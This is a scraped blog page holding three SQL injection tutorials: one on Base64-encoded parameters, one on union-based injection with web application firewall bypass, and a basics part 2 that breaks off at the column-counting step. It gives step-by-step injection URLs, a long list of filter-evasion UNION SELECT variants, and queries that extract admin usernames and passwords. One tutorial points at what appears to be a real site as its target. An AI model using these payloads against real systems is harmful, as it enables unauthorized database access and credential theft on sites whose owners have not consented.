<span style="font-size: small;"><br /></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-88488953992044277662015-05-29T08:42:00.000-07:002015-08-17T08:29:44.180-07:00Base64 Encode/Decode SQL Injection<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyCC-XqGtXojrcjo1cehonJtQupogJ52cbLpWxm6Vp8cvD5SVnfQ9f0bBbBTKkRz9UBCyojub_4hqPcpVXiW34UfeRL2XtEsJwn__XLjMg0pDix98w-Oslrwik1FjGPPbxg4fzFWwqCVP/s1600/ss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyCC-XqGtXojrcjo1cehonJtQupogJ52cbLpWxm6Vp8cvD5SVnfQ9f0bBbBTKkRz9UBCyojub_4hqPcpVXiW34UfeRL2XtEsJwn__XLjMg0pDix98w-Oslrwik1FjGPPbxg4fzFWwqCVP/s320/ss.png" title="Base64 Encode/Decode SQL Injection" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Base64 Encode/Decode SQL Injection</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Today Our Topic is Base64 encoded/decoded SQLi Queries.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here is A Example of Base64 Parameter.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/detail.php?id=MTU=</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">If we add Single Quote (') where<b> detail.php?id=MTU=' </b></span><br />
<span style="font-size: small;">We can see there is no error or any kind of Changes in the Webpage.</span><br />
<span style="font-size: small;">We cant inject These Type of Parameters Directly .</span><br />
<span style="font-size: small;"><b>SO HOW CAN WE INJECT THESE TYPE OF WEBSITES ???</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Lets Start Injecting.</span><br />
<span style="font-size: small;">Hmmm So Here Is our TARGET .</span><br />
<span style="font-size: small;">First you Have HACKBAR Addon installed in your Browser.</span><br />
<span style="font-size: small;">You Can Installed it From Here .</span><br />
<span style="font-size: small;"><a href="https://addons.mozilla.org/en-us/firefox/addon/hackbar/" target="_blank">https://addons.mozilla.org/en-us/firefox/addon/hackbar/</a></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"> See Our TARGET <b>detail.php?id=</b><b><b>MTU=</b> </b>Parameter is Encoded in Base64</span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.bio1usa.com/detail.php?id=MTU=</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOao-Q7eFZvi9cl2ZiCRMZzQVsKGkaJVsf43KWuct_Eemc0eij0fJdN74P1oy61MYlcYnUph-R-BLWM_Y7_dn8VdmPf-IfzgyHeZW-XM_0NoEKIKoR4qpoyq_021YIN2vkUcHndDiC1FwO/s1600/r1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOao-Q7eFZvi9cl2ZiCRMZzQVsKGkaJVsf43KWuct_Eemc0eij0fJdN74P1oy61MYlcYnUph-R-BLWM_Y7_dn8VdmPf-IfzgyHeZW-XM_0NoEKIKoR4qpoyq_021YIN2vkUcHndDiC1FwO/s640/r1.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Select Base64 Encoded Parameter. Open Hackbar Encoding Option and Select Base64 Decode.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ZkWAkobvj0gbAYabH1ZLL_w4VuGsaD08vrFntME9IANib2aigPcUAOnCsbco8TA-HBMRxgANYctSs0_JgFj9ihOPxQE8FY9RIutCBPhJR-wJePGZh00mAwHF_E5FXB-3wFsH-SaLmuQt/s1600/r4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ZkWAkobvj0gbAYabH1ZLL_w4VuGsaD08vrFntME9IANib2aigPcUAOnCsbco8TA-HBMRxgANYctSs0_JgFj9ihOPxQE8FY9RIutCBPhJR-wJePGZh00mAwHF_E5FXB-3wFsH-SaLmuQt/s640/r4.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And we get <b>detail.php?id=MTU= </b>Parameter as <b>detail.php?id=15</b></span><br />
<span style="font-size: small;">Now Lets Start Our Manually SQL Injection From Here<b>. </b>add Single Quote (') at The end Of Parameter And Again Encode it Using Hackbar Encoding Option <b>Base64 Encode</b> and execute URL.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjNM_sdq5K4AozaYiEqetG1v2wIwvExVfGqMYsver1RN_jMgYTTZGaMYjUmUMRfxmKn-NtaAMvt-s7nSITWMiUrO1AoXNNJ3JXRLZegAuxYnAaaNWUH9akuPl0Bsv3ZFbyk-2_GwjJh-xC/s1600/r5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjNM_sdq5K4AozaYiEqetG1v2wIwvExVfGqMYsver1RN_jMgYTTZGaMYjUmUMRfxmKn-NtaAMvt-s7nSITWMiUrO1AoXNNJ3JXRLZegAuxYnAaaNWUH9akuPl0Bsv3ZFbyk-2_GwjJh-xC/s640/r5.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And We Get MYSQL Error !!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPfzHbdxqYeg_Yg4_ryXb77pULFKTmw16ACN4Kq01-e3KXk8e_lqHS7xEZ3HBGA5dZ6ebKvUfs9KHEXr7JceANpZ1AyW7rhZXLoW3mR4zxHAyG5iG5ZDWtEqjOKuWyb7D2-E0fHHs-OEex/s1600/r6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPfzHbdxqYeg_Yg4_ryXb77pULFKTmw16ACN4Kq01-e3KXk8e_lqHS7xEZ3HBGA5dZ6ebKvUfs9KHEXr7JceANpZ1AyW7rhZXLoW3mR4zxHAyG5iG5ZDWtEqjOKuWyb7D2-E0fHHs-OEex/s640/r6.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Next Process is to Count Columns using order/group by . and After this Prepare UNION SELECT Statement for getting Tables and Columns.</span><br />
<span style="font-size: small;">Our Injection is Simple . Just what we have to do is.</span><br />
<span style="font-size: small;"> <b><br /></b></span><br />
<ol>
<li><span style="font-size: small;"><b>Base64 decode our parameter</b></span></li>
<li><span style="font-size: small;"><b>add our SQLi commands to it</b></span></li>
<li><span style="font-size: small;"><b>then Base64 encode it</b></span></li>
<li><span style="font-size: small;"><b>and execute the command</b></span></li>
</ol>
<span style="font-size: small;">These Parts Are BASIC SQL Injection.</span><br />
<span style="font-size: small;">Read From My PREVIOUS SQL Injection Tutorials.</span><br />
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a></span></div>
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-2_19.html" target="_blank">SQL Injection- Basics Of SQLi Part-2</a></span></div>
<div style="text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/union-based-sql-injection-waf-bypass.html" target="_blank">Union Based SQL Injection (WAF Bypassing)</a></span></div>
Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com3tag:blogger.com,1999:blog-5545325473666478334.post-22639737067492873862015-05-20T09:28:00.003-07:002015-08-17T08:27:21.303-07:00Union Based SQL Injection (WAF Bypassing)<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkxwxTEBNnIaqz-I5Xe5JZGn3Wsy9GGvU12mJoyHeB3q4L7F5UsVlZmsg_hVP1XS-mC1e07T8B7wdb9Qyh-eYQtjW3VI1EenezGFVHu-eR_CTK1q971ZrO3nwaLFeFgAZv6sJWw4Imcqg/s1600/ew.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGkxwxTEBNnIaqz-I5Xe5JZGn3Wsy9GGvU12mJoyHeB3q4L7F5UsVlZmsg_hVP1XS-mC1e07T8B7wdb9Qyh-eYQtjW3VI1EenezGFVHu-eR_CTK1q971ZrO3nwaLFeFgAZv6sJWw4Imcqg/s1600/ew.jpg" /></a></span></div>
<span style="font-size: small;"> </span><br />
<span style="font-size: small;">After Our Tutorial on Basics Of SQL Injection. </span><br />
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a></span><br />
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-2_19.html" target="_blank">SQL Injection- Basics Of SQLi Part-2</a></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Union based SQL injection + WAF Bypassing</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.</span><br />
<span style="font-size: small;">Lets Start Injecting.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Is Our Target .</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11</b></span><br />
<span style="font-size: small;">Add Single Quote (') at the End Of The URL .</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11' </b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyysNuBcZnLBg7y4hFYtW2pb7Mn1XZye66_psQW2AYuiVNjKelDhD_0VxktOWohUnDwQNsRIKu2bu53SIPgO58JTmpgHBYBsSMWqVQb47TW41WFobLnGIChtTEhx4WPJ-fc428CiZQ9THZ/s1600/ada.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Union Based SQL Injection (WAF Bypassing)" border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyysNuBcZnLBg7y4hFYtW2pb7Mn1XZye66_psQW2AYuiVNjKelDhD_0VxktOWohUnDwQNsRIKu2bu53SIPgO58JTmpgHBYBsSMWqVQb47TW41WFobLnGIChtTEhx4WPJ-fc428CiZQ9THZ/s640/ada.png" title="Union Based SQL Injection (WAF Bypassing)" width="640" /></a></span></div>
<span style="font-size: small;">And Get MYSQL Error.</span><br />
<span style="font-size: small;">Lets Balance Our Query for Further Injecting.</span><br />
<span style="font-size: small;">Some Comments from our Previous Tutorials.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11--</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11-- - </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11%23</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11;</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Is A Small Explanation on Balance and Comment in our Injection.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvG7LVRIqsOd0aQd_MqCpMrYsJPEnlze0hB5lXDa1SAX8d7QR4QmTbOiWKbA8Dh0mIwfdbuCn28KyCERTtlFJtaSm5EGE9LwuTr2Dwo2g554RL_y_k3WySD5zTgh2LOJambJ04hv7DK-C-/s1600/bb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Union Based SQL Injection (WAF Bypassing)" border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvG7LVRIqsOd0aQd_MqCpMrYsJPEnlze0hB5lXDa1SAX8d7QR4QmTbOiWKbA8Dh0mIwfdbuCn28KyCERTtlFJtaSm5EGE9LwuTr2Dwo2g554RL_y_k3WySD5zTgh2LOJambJ04hv7DK-C-/s400/bb.jpg" title="Union Based SQL Injection (WAF Bypassing)" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After Balancing Our Query . Next is Count Total Number Of Columns</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 1--+</b></span><br />
<span style="font-size: small;">No Error !</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 3--+</b></span><br />
<span style="font-size: small;">No Error!</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 5--+</b></span><br />
<span style="font-size: small;">Again No Error !</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 order by 6--+</b></span><br />
<span style="font-size: small;">Here We Get Error !</span><br />
<span style="font-size: small;">Unknown column '6' in 'order clause'</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Try To Find Our Vulnerable Columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">So Here some WAF Bypassing Methods.</span><br />
<ul>
<li><span style="font-size: small;"> <b>/*!%55NiOn*/ /*!%53eLEct*/</b></span></li>
<li><span style="font-size: small;"><b> %55nion(%53elect 1,2,3)-- -</b></span></li>
<li><span style="font-size: small;"><b> +union+distinct+select+</b></span></li>
<li><span style="font-size: small;"><b> +union+distinctROW+select+</b></span></li>
<li><span style="font-size: small;"><b> /**//*!12345UNION SELECT*//**/</b></span></li>
<li><span style="font-size: small;"><b> /**//*!50000UNION SELECT*//**/</b></span></li>
<li><span style="font-size: small;"><b> /**/UNION/**//*!50000SELECT*//**/</b></span></li>
<li><span style="font-size: small;"><b> /*!50000UniON SeLeCt*/</b></span></li>
<li><span style="font-size: small;"><b> union /*!50000%53elect*/</b></span></li>
<li><span style="font-size: small;"><b> +#uNiOn+#sEleCt</b></span></li>
<li><span style="font-size: small;"><b> +#1q%0AuNiOn all#qa%0A#%0AsEleCt</b></span></li>
<li><span style="font-size: small;"><b> /*!%55NiOn*/ /*!%53eLEct*/</b></span></li>
<li><span style="font-size: small;"><b> /*!u%6eion*/ /*!se%6cect*/</b></span></li>
<li><span style="font-size: small;"><b> +un/**/ion+se/**/lect</b></span></li>
<li><span style="font-size: small;"><b> uni%0bon+se%0blect</b></span></li>
<li><span style="font-size: small;"><b> %2f**%2funion%2f**%2fselect</b></span></li>
<li><span style="font-size: small;"><b> union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A</b></span></li>
<li><span style="font-size: small;"><b> REVERSE(noinu)+REVERSE(tceles)</b></span></li>
<li><span style="font-size: small;"><b> /*--*/union/*--*/select/*--*/</b></span></li>
<li><span style="font-size: small;"><b> union (/*!/**/ SeleCT */ 1,2,3)</b></span></li>
<li><span style="font-size: small;"><b> /*!union*/+/*!select*/</b></span></li>
<li><span style="font-size: small;"><b> union+/*!select*/</b></span></li>
<li><span style="font-size: small;"><b> /**/union/**/select/**/</b></span></li>
<li><span style="font-size: small;"><b> /**/uNIon/**/sEleCt/**/</b></span></li>
<li><span style="font-size: small;"><b> /**//*!union*//**//*!select*//**/</b></span></li>
<li><span style="font-size: small;"><b> /*!uNIOn*/ /*!SelECt*/</b></span></li>
<li><span style="font-size: small;"><b> +union+distinct+select+</b></span></li>
<li><span style="font-size: small;"><b> +union+distinctROW+select+</b></span></li>
</ul>
<span style="font-size: small;"><b> </b>Just Change The Union Select With Following Bypass URLs.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Lets Continue Our Tutorial.</span><br />
<span style="font-size: small;">Now Check The Vulnerable Columns.we Use ( - ) for Finding Vulnerable columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Can Also Check Vulnerable Columns with Other methods instead of Just Using (-).</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Are Some Vulnerable Columns Checking Methods With Examples.</span><br />
<span style="font-size: small;">Using And 0</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using And False</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using Div 0</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using null</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Using .1337</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+ </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Will Get Our Vulnerable Columns Printed On The Page.3 is Our Vulnerable Column.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWr2adTwOclpa7p2WPFK6nqVDAruirra5RaFpYsZrK89GnTYj3-Q_1nJNO2ne51qyNNTSmF77FGS53IMc1-kl274_wbGBAqO5Zl_9vYX29rgyLon59-eMvr5DMf9NjxzQlqAOlaVptuu9s/s1600/rr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Union Based SQL Injection (WAF Bypassing)" border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWr2adTwOclpa7p2WPFK6nqVDAruirra5RaFpYsZrK89GnTYj3-Q_1nJNO2ne51qyNNTSmF77FGS53IMc1-kl274_wbGBAqO5Zl_9vYX29rgyLon59-eMvr5DMf9NjxzQlqAOlaVptuu9s/s320/rr.png" title="Union Based SQL Injection (WAF Bypassing)" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">
Here Are Some Variables Of MYSQL.</span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">@@version = Current Version</span><br />
<span style="font-size: small;">@@GLOBAL.VERSION = Current Version</span><br />
<span style="font-size: small;">User() = Current User</span><br />
<span style="font-size: small;">Database = Current Database</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Can See Current Version Printed on the Page.</span><br />
<span style="font-size: small;"> Next Step Is To Get The Tables.</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We can See Total Tables in Our Primary Database.</span><br />
<span style="font-size: small;">Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.</span><br />
<span style="font-size: small;">then encode admin table name in MYSQL Char() to get The Columns in the Admin Table.Change table_name to column_name,information_schema.tables to information_schema.columns and Table_schema to Table_name.And Replace Database() with our MYSQL Char() admin value.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select
1,2,concat(column_name),4,5 from information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">we can see the Column Names on Page . like id,username,pass</span><br />
<span style="font-size: small;">to Get The Data From columns here is our final Query.</span><br />
<span style="font-size: small;"><b>http://www.targetsite.com/news.php?id=-11 Union Select
1,2,concat(username,0x3a,password),4,5 from admin--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Author: Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com7tag:blogger.com,1999:blog-5545325473666478334.post-23995834284057911822015-05-19T08:59:00.000-07:002015-09-19T10:35:42.065-07:00 SQL Injection- Basics Of SQLi Part-2<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUffKu1oLv_vf-Xhn1nJ4qyB1LhHfzqXRGAk9kxUwi8t3zSVSYx8FMUbOiV26SD9muxCaaKGDaVV3yvwdSm0Ad5l-JXtoyBA-jA8gRv_528JasK5uTRy9xrV1RIIpf45hmZptuxDMu8Whu/s1600/hhh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUffKu1oLv_vf-Xhn1nJ4qyB1LhHfzqXRGAk9kxUwi8t3zSVSYx8FMUbOiV26SD9muxCaaKGDaVV3yvwdSm0Ad5l-JXtoyBA-jA8gRv_528JasK5uTRy9xrV1RIIpf45hmZptuxDMu8Whu/s1600/hhh.jpg" title=" SQL Injection- Basics Of SQLi Part-2" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;">After Reading my First Tutorial on Basics Of SQL Injection Here is Next Tutorial .</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b>SQL Injection- Basics Of SQLi Part-2 By RAi Jee</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<a name='more'></a><span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> Mostly When we are Injection a Site we Just Check if It Gives MySQL Error or not as in Shown this Picture.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVXykyQzQ4Q1-DyoePEibU9st_Q2IAd5ROvsKvPvHIdMgQdeOg82hPQ9i-npeL_CzE55ae8ZKtkmCKlSJi0PHIETXJdfQrQ4MYRBYd6CiCzAIziBGANqZqb8hRDpKxM8yfy1BLLxNmQrg0/s1600/ss.png" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVXykyQzQ4Q1-DyoePEibU9st_Q2IAd5ROvsKvPvHIdMgQdeOg82hPQ9i-npeL_CzE55ae8ZKtkmCKlSJi0PHIETXJdfQrQ4MYRBYd6CiCzAIziBGANqZqb8hRDpKxM8yfy1BLLxNmQrg0/s640/ss.png" title=" SQL Injection- Basics Of SQLi Part-2" width="640" /></a> But In Some Cases we injecting a site and add single Quote " ' " to check Vulnerability and execute URL. For Example,</span><br />
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We didn't Get Any Error But if we Notice there are small Changes in Page .For Example.</span><br />
<span style="font-size: small;">Here is the Normal Page of our Target Site.</span><br />
<span style="font-size: small;"><b> http://www.fakesite.com/detail.php?id=1</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWAvjtWsHXxtoih4eZTfsUKp__ImHH7hdExn8HtgWUQyjTJpkrKNGms8nbHvXXXjUWHc2s81pWlmJHcva7RFTjfEv2csQaj8pPgRcbQRMpPrXaqwWYSXJCIvX5qnCUQDcSSJFSX2d08oS/s1600/er.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWAvjtWsHXxtoih4eZTfsUKp__ImHH7hdExn8HtgWUQyjTJpkrKNGms8nbHvXXXjUWHc2s81pWlmJHcva7RFTjfEv2csQaj8pPgRcbQRMpPrXaqwWYSXJCIvX5qnCUQDcSSJFSX2d08oS/s400/er.png" title=" SQL Injection- Basics Of SQLi Part-2" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1'</b></span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After Adding Single Quote " ' " it doesnt give any kind Of Error But If We Notice The Webpage There Are Some Changes In Page and Some Content is missing.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJuqyjC3uOVWjIbTkyljeJMdgA4YtPnwk_og8finHjF-6-fdAUDHo_dKjIhWGuU2kmVRWY0QDHHyDTG9MrfyLU_35H_6AwlLNK841P2-6xx5h8YFU-Hm2EHCyV5HFO82NQgvvym22Vz8Qq/s1600/fh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SQL Injection- Basics Of SQLi Part-2" border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJuqyjC3uOVWjIbTkyljeJMdgA4YtPnwk_og8finHjF-6-fdAUDHo_dKjIhWGuU2kmVRWY0QDHHyDTG9MrfyLU_35H_6AwlLNK841P2-6xx5h8YFU-Hm2EHCyV5HFO82NQgvvym22Vz8Qq/s400/fh.png" title=" SQL Injection- Basics Of SQLi Part-2" width="400" /></a></span></div>
<span style="font-size: small;"> Now Lets try to Balance Our Query as we Have Learn From Our</span><br />
<span style="font-size: small;">First Tutorial <a href="http://raijee1337.blogspot.com/2015/05/sql-injection-basics-of-sqli-part-1.html" target="_blank">SQL Injection- Basics Of SQLi Part-1</a></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.fakesite.com/detail.php?id=1--</b></span><br />
<span style="font-size: small;">Page Normally Loaded.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Use Order By To Check Total Number of Columns .</span><br />
<span style="font-size: small;"><br /></span>
